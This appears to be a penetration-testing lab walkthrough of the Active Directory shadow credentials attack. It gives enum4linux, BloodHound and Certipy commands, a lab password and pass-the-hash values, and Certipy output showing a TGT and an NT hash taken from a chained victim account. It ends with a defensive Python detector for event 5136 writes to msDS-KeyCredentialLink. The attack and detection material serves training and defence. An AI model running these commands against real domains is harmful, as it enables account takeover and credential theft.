
# Shadow Credentials

* The shadow credentials attack consists of using the GenericAll or GenericWrite privilege on a user or computer object to write its msDS-KeyCredentialLink attribute. Full explanation [here](https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab).
* DACL-based movement is covered on Shutdown's (@\_nwodtuhs) website, The Hacker Recipes: <https://www.thehacker.recipes/ad/movement/dacl>
* This attack is very useful when you have write privileges on another user.
* With GenericWrite you can only do:
  * Targeted Kerberoasting: add an SPN to the user, Kerberoast it, then unset the SPN. But the user's password must be weak for the Kerberoasting attack to work.
  * Set up a logon script: change the LDAP attribute to set a logon script. But it implies that the user logs on to their computer, that an SMB server or share serves the script, and that the script bypasses the security solutions in place.
  * Shadow credentials: the attack we want to do; it requires a certificate service (ADCS) on the domain.
* With GenericAll you can:
  * ForceChangePassword: but on a real pentest you don't want to lock a user out by changing their password, and it is not very stealthy either. So if you can do it another way, that is better :)
  * All the attacks available in the GenericWrite part.

So if ADCS is enabled on the domain and we have write privilege on msDS-KeyCredentialLink, we can do the shadow credentials attack to get direct access to the user account. This seems to be the best option in this case on a real pentest.

* Shadow credentials is now included in Certipy (this attack can also be done with [pywhisker](https://github.com/ShutdownRepo/pywhisker)).

```
joaquin.Pereida@maryland.local > Marisol.Pedrosa > Teresa.Perez
```

```
enum4linux -u joaquin.Pereida@maryland.local -p horse -G 192.168.56.12
```

### Start BloodHound and Neo4j

```
sudo /usr/bin/./neo4j console
sudo /opt/tools/BloodHound4.2-ly4k/BloodHound-linux-x64/BloodHound  --no-sandbox --disable-dev-shm-usage
```

<figure><img src="/files/GH8vUXpXNUR5drobS3KN" alt=""><figcaption></figcaption></figure>

```
certipy shadow auto -u joaquin.Pereida@maryland.local -p 'horse' -account 'marisol.Pedrosa'
```

<figure><img src="/files/z5Pja449ybCLYUr04woP" alt=""><figcaption></figcaption></figure>

* And we can do the same from Marisol.Pedrosa to Teresa.Perez:

```
certipy shadow auto -u marisol.Pedrosa@maryland.local -hashes 'fd208d19680104ddb8e3d90962c0334e' -account 'teresa.Perez'
```

<figure><img src="/files/ZtfXQAaOMZ99kbTjSKxv" alt=""><figcaption></figcaption></figure>

```
certipy shadow auto -u marisol.Pedrosa@maryland.local -hashes 'fd208d19680104ddb8e3d90962c0334e' -account 'teresa.Perez'
Certipy v4.3.0 - by Oliver Lyak (ly4k)

[*] Targeting user 'teresa.Perez'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '4d026165-030a-b52a-4ae9-9c0c28eb1fe9'
[*] Adding Key Credential with device ID '4d026165-030a-b52a-4ae9-9c0c28eb1fe9' to the Key Credentials for 'teresa.Perez'
[*] Successfully added Key Credential with device ID '4d026165-030a-b52a-4ae9-9c0c28eb1fe9' to the Key Credentials for 'teresa.Perez'
[*] Authenticating as 'teresa.Perez' with the certificate
[*] Using principal: teresa.perez@maryland.local
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'teresa.perez.ccache'
[*] Trying to retrieve NT hash for 'teresa.perez'
[*] Restoring the old Key Credentials for 'teresa.Perez'
[*] Successfully restored the old Key Credentials for 'teresa.Perez'
[*] NT hash for 'teresa.Perez': 4d737ec9ecf0b9955a161773cfed9611
```
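From the defender's side, the run above leaves a recognisable trace: a value is added to msDS-KeyCredentialLink on the target and, in `auto` mode, the old value is restored seconds later. On a domain controller with the "Audit Directory Service Changes" subcategory enabled and a SACL on the user objects, each of those writes is logged as Security event 5136 with `AttributeLDAPDisplayName` set to `msDS-KeyCredentialLink` and an `OperationType` of Value Added (`%%14674`) or Value Deleted (`%%14675`). The following detection logic is an added example, not code from this page or from Certipy: it parses 5136 XML records, flags every write to that attribute, and escalates when the same subject removes a value from the same object within a short window. The event XML, the account names and the timestamps are constructed sample data modelled on the lab above; the auditing prerequisites are assumed to be in place.

```python
import re
import xml.etree.ElementTree as ET
from datetime import datetime, timedelta

# Namespace used by Windows event XML (e.g. Get-WinEvent ... .ToXml())
NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}
TARGET_ATTR = "msDS-KeyCredentialLink"
OP_VALUE_ADDED = "%%14674"    # 5136 OperationType: Value Added
OP_VALUE_DELETED = "%%14675"  # 5136 OperationType: Value Deleted


def parse_5136(xml_text):
    """Return the fields of a 5136 event we care about, or None for any other event."""
    root = ET.fromstring(xml_text)
    if root.findtext("e:System/e:EventID", namespaces=NS) != "5136":
        return None
    system_time = root.find("e:System/e:TimeCreated", NS).attrib["SystemTime"]
    # Windows writes 7 fractional digits; drop them so strptime accepts the stamp
    stamp = re.sub(r"\.\d+", "", system_time)
    data = {d.attrib["Name"]: (d.text or "") for d in root.findall("e:EventData/e:Data", NS)}
    return {
        "time": datetime.strptime(stamp, "%Y-%m-%dT%H:%M:%SZ"),
        "subject": f"{data.get('SubjectDomainName', '')}\\{data.get('SubjectUserName', '')}",
        "object_dn": data.get("ObjectDN", ""),
        "attribute": data.get("AttributeLDAPDisplayName", ""),
        "operation": data.get("OperationType", ""),
    }


def detect_key_credential_writes(events, window=timedelta(minutes=15)):
    """Flag every write to msDS-KeyCredentialLink; escalate when the same subject
    removes a value from the same object shortly after adding one (the
    add-then-restore sequence that tooling cleaning up after itself leaves behind)."""
    changes = sorted((e for e in events if e and e["attribute"] == TARGET_ATTR),
                     key=lambda e: e["time"])
    alerts = []
    for i, ev in enumerate(changes):
        if ev["operation"] != OP_VALUE_ADDED:
            continue
        pattern = "key_credential_added"
        for later in changes[i + 1:]:
            if later["time"] - ev["time"] > window:
                break
            if (later["operation"] == OP_VALUE_DELETED
                    and later["object_dn"] == ev["object_dn"]
                    and later["subject"] == ev["subject"]):
                pattern = "key_credential_added_then_removed"
                break
        alerts.append({"object_dn": ev["object_dn"], "subject": ev["subject"],
                       "time": ev["time"], "pattern": pattern})
    return alerts


def _event(event_id, time, subject, object_dn, attr, op):
    # Constructed, minimal 5136-shaped XML; real events carry more Data fields
    return f"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><EventID>{event_id}</EventID><TimeCreated SystemTime="{time}"/></System>
  <EventData>
    <Data Name="SubjectUserName">{subject}</Data>
    <Data Name="SubjectDomainName">MARYLAND</Data>
    <Data Name="ObjectDN">{object_dn}</Data>
    <Data Name="ObjectClass">user</Data>
    <Data Name="AttributeLDAPDisplayName">{attr}</Data>
    <Data Name="OperationType">{op}</Data>
  </EventData>
</Event>"""


# Constructed sample: an add-then-restore on Teresa, a lone add on Marisol,
# an unrelated SPN change and a non-5136 event that must be ignored.
TERESA = "CN=Teresa Perez,CN=Users,DC=maryland,DC=local"
MARISOL = "CN=Marisol Pedrosa,CN=Users,DC=maryland,DC=local"
SAMPLE_EVENTS = [
    _event(5136, "2024-05-01T10:00:00.1234567Z", "marisol.Pedrosa", TERESA, TARGET_ATTR, OP_VALUE_ADDED),
    _event(5136, "2024-05-01T10:00:04.0000000Z", "marisol.Pedrosa", TERESA, TARGET_ATTR, OP_VALUE_DELETED),
    _event(5136, "2024-05-01T10:02:00.0000000Z", "joaquin.Pereida", MARISOL, TARGET_ATTR, OP_VALUE_ADDED),
    _event(5136, "2024-05-01T10:03:00.0000000Z", "joaquin.Pereida", MARISOL, "servicePrincipalName", OP_VALUE_ADDED),
    _event(5137, "2024-05-01T10:04:00.0000000Z", "joaquin.Pereida", MARISOL, "", ""),
]


def run_sample():
    return detect_key_credential_writes([parse_5136(x) for x in SAMPLE_EVENTS])


if __name__ == "__main__":
    for alert in run_sample():
        print(alert["time"], alert["pattern"], alert["subject"], "->", alert["object_dn"])
```

Two caveats when running this against real logs: without the audit subcategory and a SACL covering the user objects no 5136 is generated at all, so the first check is whether the events exist; and legitimate Windows Hello for Business enrolment also writes this attribute, so the subject of the write (someone other than the account itself or a trusted provisioning identity) is what separates the two cases, not the attribute name alone.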

